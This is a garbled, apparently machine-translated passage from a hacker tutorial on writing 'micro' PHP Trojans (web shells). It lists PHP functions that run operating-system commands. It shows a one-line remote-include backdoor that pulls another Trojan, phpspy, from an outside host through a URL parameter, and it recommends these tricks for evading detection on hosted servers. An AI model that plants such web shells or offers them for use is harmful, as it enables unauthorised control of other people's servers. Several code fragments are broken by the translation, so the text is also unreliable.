The powerful PHP syntax is beyond the reach of ASP. Only one of them can be used to probe the configuration of the entire server. Running cmd and uploading files are very simple. Currently, the PHP Trojan is better than phpspy of angel. Yesterday, hak_ban asked me how to encrypt the PHP Trojan. I did not expect it, but it is still very difficult for me to write a micro-PHP Trojan.
Here we will briefly discuss several functions that can be used as Trojans:
1. Several functions that can run external commands: system, passthru, exec, shell_exec, and popen.
For example, you only need to set $ cmd);?> And can be used to run external commands. These functions can be said to be the earliest micro-row php Trojan, so the General Virtual Host settings will also block these functions.
2. Do you still remember the style. php vulnerability in the WDB forum? We can use this Trojan to make it difficult to be killed. As follows:
<?php include(
$include);?>
|
Save it as 1.php, we can call other. php Trojans (such as phpspy. php) that do not support the php server to achieve our goal: http://6688.cc/1.php? Include = http://www.6688.cc/phpspy.php
The http://www.6688.cc here does not support php, otherwise it will run phpspy. php on the http://www.6688.cc server, not the target server.
[Content navigation] |
Page 1st: [hacker Trojan Programming Tutorial] micro-PHP Trojan Parsing |
Page 2nd: [hacker Trojan Programming Tutorial] micro-PHP Trojan Parsing |